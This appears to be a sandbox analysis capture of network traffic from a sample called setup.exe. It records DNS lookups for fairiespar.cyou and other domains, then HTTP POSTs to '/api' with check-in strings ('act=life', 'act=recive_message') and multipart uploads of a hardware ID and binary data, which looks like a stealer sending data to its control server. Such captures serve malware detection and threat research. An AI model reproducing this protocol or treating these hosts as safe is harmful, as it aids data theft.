                                                                                                                            Jan 7, 2025 15:26:23.299283028 CET44349760188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:23.299386978 CET49760443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:23.299763918 CET49760443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:23.299787998 CET44349760188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:23.811206102 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:23.811248064 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:23.811361074 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:23.811825991 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:23.811839104 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:24.287530899 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:24.288140059 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:24.296412945 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:24.296433926 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:24.296715021 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:24.298532009 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:24.298886061 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:24.298896074 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:24.744048119 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:24.744143009 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:24.744391918 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:24.744391918 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.004736900 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.004798889 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:25.004868984 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.005532026 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.005547047 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:25.047332048 CET49772443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.047357082 CET44349772188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:25.484349966 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:25.484416008 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.487384081 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.487396002 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:25.487677097 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:25.489001036 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.489124060 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:25.489130020 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:30.481734991 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:30.481869936 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:30.481995106 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:30.482156038 CET49779443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:30.482183933 CET44349779188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:30.485601902 CET49816443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:30.485651970 CET44349816188.114.97.3192.168.2.7
                                                                                                                            Jan 7, 2025 15:26:30.485726118 CET49816443192.168.2.7188.114.97.3
                                                                                                                            Jan 7, 2025 15:26:30.486093044 CET49816443192.168.2.7188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
--- | --- | --- | --- | ---
Jan 7, 2025 15:26:17.562438965 CET | 55627 | 53 | 192.168.2.7 | 1.1.1.1
Jan 7, 2025 15:26:17.577310085 CET | 53 | 55627 | 1.1.1.1 | 192.168.2.7
Jan 7, 2025 15:26:31.463399887 CET | 62915 | 53 | 192.168.2.7 | 1.1.1.1
Jan 7, 2025 15:26:31.568305969 CET | 53 | 62915 | 1.1.1.1 | 192.168.2.7
Jan 7, 2025 15:26:32.661422014 CET | 52301 | 53 | 192.168.2.7 | 1.1.1.1
Jan 7, 2025 15:26:32.670677900 CET | 53 | 52301 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | ---
Jan 7, 2025 15:26:17.562438965 CET | 192.168.2.7 | 1.1.1.1 | 0xcec4 | Standard query (0) | fairiespar.cyou | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:26:31.463399887 CET | 192.168.2.7 | 1.1.1.1 | 0x4e3a | Standard query (0) | cegu.shop | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:26:32.661422014 CET | 192.168.2.7 | 1.1.1.1 | 0xafe2 | Standard query (0) | klipvumisui.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Jan 7, 2025 15:26:17.577310085 CET | 1.1.1.1 | 192.168.2.7 | 0xcec4 | No error (0) | fairiespar.cyou | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:26:17.577310085 CET | 1.1.1.1 | 192.168.2.7 | 0xcec4 | No error (0) | fairiespar.cyou | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:26:31.568305969 CET | 1.1.1.1 | 192.168.2.7 | 0x4e3a | No error (0) | cegu.shop | | 185.161.251.21 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 15:26:32.670677900 CET | 1.1.1.1 | 192.168.2.7 | 0xafe2 | Name error (3) | klipvumisui.shop | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                            • fairiespar.cyou
                                                                                                                            • cegu.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
--- | --- | --- | --- | --- | --- | ---
0 | 192.168.2.7 | 49726 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe

Timestamp / Bytes transferred / Direction / Data

2025-01-07 14:26:18 UTC  262 bytes  OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: fairiespar.cyou

2025-01-07 14:26:18 UTC  8 bytes  OUT
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life

2025-01-07 14:26:18 UTC  1125 bytes  IN
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 14:26:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=7m7usi1p9i43fjt07fbg0cumou; expires=Sat, 03 May 2025 08:12:57 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aGwrufTpJuYyUPtu6p42PK1Y746WftpzHOxCLS%2FVyimC81W4zZtRd4Sl%2BVio5HOBIQymz7wHn73BujAyxsvKihbWkGMpv%2Bm5cOVS1uexJocu7Vw2YPyLs5OtzRohGwwfK%2BA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe49f3face342b5-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1746&rtt_var=682&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1672394&cwnd=218&unsent_bytes=0&cid=a7108cf90f9787ad&ts=511&x=0"

2025-01-07 14:26:18 UTC  7 bytes  IN
Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok

2025-01-07 14:26:18 UTC  5 bytes  IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
--- | --- | --- | --- | --- | --- | ---
1 | 192.168.2.7 | 49732 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe

Timestamp / Bytes transferred / Direction / Data

2025-01-07 14:26:19 UTC  263 bytes  OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 78
Host: fairiespar.cyou

2025-01-07 14:26:19 UTC  78 bytes  OUT
Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ALFA&j=efdebde057a1df3f7c15b7f4da907c2d

2025-01-07 14:26:19 UTC  1121 bytes  IN
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 14:26:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=nkgpjshg6ulhn4b62iq690su3j; expires=Sat, 03 May 2025 08:12:58 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tms5bZwLhscuDd0fSebDIocL3CMh3C6Ixdl0GwnNRotZR4%2B5Bvay3q0m%2FjU5OmRdww9rFeS4Ru0xFNY6BnBLdquRIdHt4YcBE8hrkHPYM3g2UsPT2t2BtvpAJrs6bLCUoLo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe49f462d6cefa9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2023&rtt_var=777&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=977&delivery_rate=1393129&cwnd=158&unsent_bytes=0&cid=6e11951220dca7fe&ts=448&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49742 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 14:26:20 UTC | 272 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=TYDIAY273
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12789
Host: fairiespar.cyou
2025-01-07 14:26:20 UTC | 12789 | OUT | Data Raw: 2d 2d 54 59 44 49 41 59 32 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 32 37 37 46 46 36 41 43 46 39 30 37 35 43 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 54 59 44 49 41 59 32 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 59 44 49 41 59 32 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 54 59 44 49 41 59 32 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
Data Ascii: --TYDIAY273Content-Disposition: form-data; name="hwid"DD277FF6ACF9075CD99589CE8AE665D5--TYDIAY273Content-Disposition: form-data; name="pid"2--TYDIAY273Content-Disposition: form-data; name="lid"hRjzG3--ALFA--TYDIAY273Content-Dispo
2025-01-07 14:26:20 UTC | 1122 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 14:26:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=kc83sf15gc8pihd0bc6pth9gbg; expires=Sat, 03 May 2025 08:12:59 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=an3dBreEkzhnNMoUAmo69fqdkq6ii4wY39Z34S0rs0Sw%2BkSslcosflYrSirDlD94bDCRwtHzGgPIkvhZM8HoKdb9tYRpA8mdSIZwSKFftBKvPU5sio7K4fl6BAp1VHgCokk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe49f4ccf238c54-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1811&rtt_var=688&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13719&delivery_rate=1580942&cwnd=184&unsent_bytes=0&cid=72ace250ab099383&ts=597&x=0"
2025-01-07 14:26:20 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-07 14:26:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49749 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 14:26:21 UTC | 277 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=Q61JI54KSSXTH9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15051
Host: fairiespar.cyou
2025-01-07 14:26:21 UTC | 15051 | OUT | Data Raw: 2d 2d 51 36 31 4a 49 35 34 4b 53 53 58 54 48 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 32 37 37 46 46 36 41 43 46 39 30 37 35 43 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 51 36 31 4a 49 35 34 4b 53 53 58 54 48 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 36 31 4a 49 35 34 4b 53 53 58 54 48 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 51 36 31 4a 49 35 34 4b 53
Data Ascii: --Q61JI54KSSXTH9Content-Disposition: form-data; name="hwid"DD277FF6ACF9075CD99589CE8AE665D5--Q61JI54KSSXTH9Content-Disposition: form-data; name="pid"2--Q61JI54KSSXTH9Content-Disposition: form-data; name="lid"hRjzG3--ALFA--Q61JI54KS
2025-01-07 14:26:21 UTC | 1123 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 14:26:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=j2qevbt23afvsuad47shdgsrn5; expires=Sat, 03 May 2025 08:13:00 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JTz5cbbeSMWdxOQGXXaYfk3yiY4nczgY9TJWYA%2BCsQgsl2cDA6owlrBnESHFN1es7wTuRLL32I6PhGkbEfOEsOctGch3DZWs8fAkQmIgeF3FuihmeS3GG0T8ngifdfLv6%2B8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe49f54b8ea422d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1703&rtt_var=851&sent=10&recv=19&lost=0&retrans=1&sent_bytes=4208&recv_bytes=15986&delivery_rate=65761&cwnd=232&unsent_bytes=0&cid=247b2e1a5200eb68&ts=553&x=0"
2025-01-07 14:26:21 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-07 14:26:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49760 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 14:26:22 UTC | 278 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=AHNCTC1XIG648DU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20382
Host: fairiespar.cyou
2025-01-07 14:26:22 UTC | 15331 | OUT | Data Raw: 2d 2d 41 48 4e 43 54 43 31 58 49 47 36 34 38 44 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 32 37 37 46 46 36 41 43 46 39 30 37 35 43 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 41 48 4e 43 54 43 31 58 49 47 36 34 38 44 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 48 4e 43 54 43 31 58 49 47 36 34 38 44 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 41 48 4e 43 54 43
Data Ascii: --AHNCTC1XIG648DUContent-Disposition: form-data; name="hwid"DD277FF6ACF9075CD99589CE8AE665D5--AHNCTC1XIG648DUContent-Disposition: form-data; name="pid"3--AHNCTC1XIG648DUContent-Disposition: form-data; name="lid"hRjzG3--ALFA--AHNCTC
2025-01-07 14:26:22 UTC | 5051 | OUT | Data Raw: da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00
Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
2025-01-07 14:26:23 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 14:26:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=vol50i7ch9aiv139ddvlb0lk96; expires=Sat, 03 May 2025 08:13:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YHyIEejSqU8nKcCgBR7yQxjPLeIzqfDeeqGb9Y%2FpbBMom%2Fr1INkuw8liDTbBTN5iKrC7q%2B4RL7Ov4aWHPKvrALZKjCgjW75%2BGtBVdniSwVEFEeYmhT%2FBI1hqgR0neUCWtnw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe49f5bfeb442b3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1902&min_rtt=1900&rtt_var=718&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21340&delivery_rate=1519250&cwnd=237&unsent_bytes=0&cid=439307dba16a1b3e&ts=640&x=0"
2025-01-07 14:26:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-07 14:26:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49772 | 188.114.97.3 | 443 | 5916 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 14:26:24 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=HGEE2DGAOBV12WIIPM8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1250
Host: fairiespar.cyou
2025-01-07 14:26:24 UTC | 1250 | OUT | Data Raw: 2d 2d 48 47 45 45 32 44 47 41 4f 42 56 31 32 57 49 49 50 4d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 32 37 37 46 46 36 41 43 46 39 30 37 35 43 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 48 47 45 45 32 44 47 41 4f 42 56 31 32 57 49 49 50 4d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 47 45 45 32 44 47 41 4f 42 56 31 32 57 49 49 50 4d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c
Data Ascii: --HGEE2DGAOBV12WIIPM8Content-Disposition: form-data; name="hwid"DD277FF6ACF9075CD99589CE8AE665D5--HGEE2DGAOBV12WIIPM8Content-Disposition: form-data; name="pid"1--HGEE2DGAOBV12WIIPM8Content-Disposition: form-data; name="lid"hRjzG3--AL
2025-01-07 14:26:24 UTC | 1126 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 14:26:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=31adp7cdnk867f2kv8jm2bvhob; expires=Sat, 03 May 2025 08:13:03 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p4ef%2BvfITm33w1pWK69Yqxzm8xHdTEBdXOsWc8fF82Wuzcb8ge7%2FP5Bln%2FzPszOG7PncFcgm9MCHJzRvyh4o%2BsnFrDYhfRMxpliLP2b9b43z9tLTJsptZawDpM83dVjPPFs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe49f662d2ec333-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1642&rtt_var=653&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2167&delivery_rate=1778319&cwnd=143&unsent_bytes=0&cid=6fdb3e2f79cf9477&ts=463&x=0"
2025-01-07 14:26:24 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-07 14:26:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.749779188.114.97.34435916C:\Users\user\Desktop\setup.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2025-01-07 14:26:25 UTC281OUTPOST /api HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: multipart/form-data; boundary=O7VDALVF2KL0A50MGLZ
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                            Content-Length: 1110
                                                                                                                            Host: fairiespar.cyou
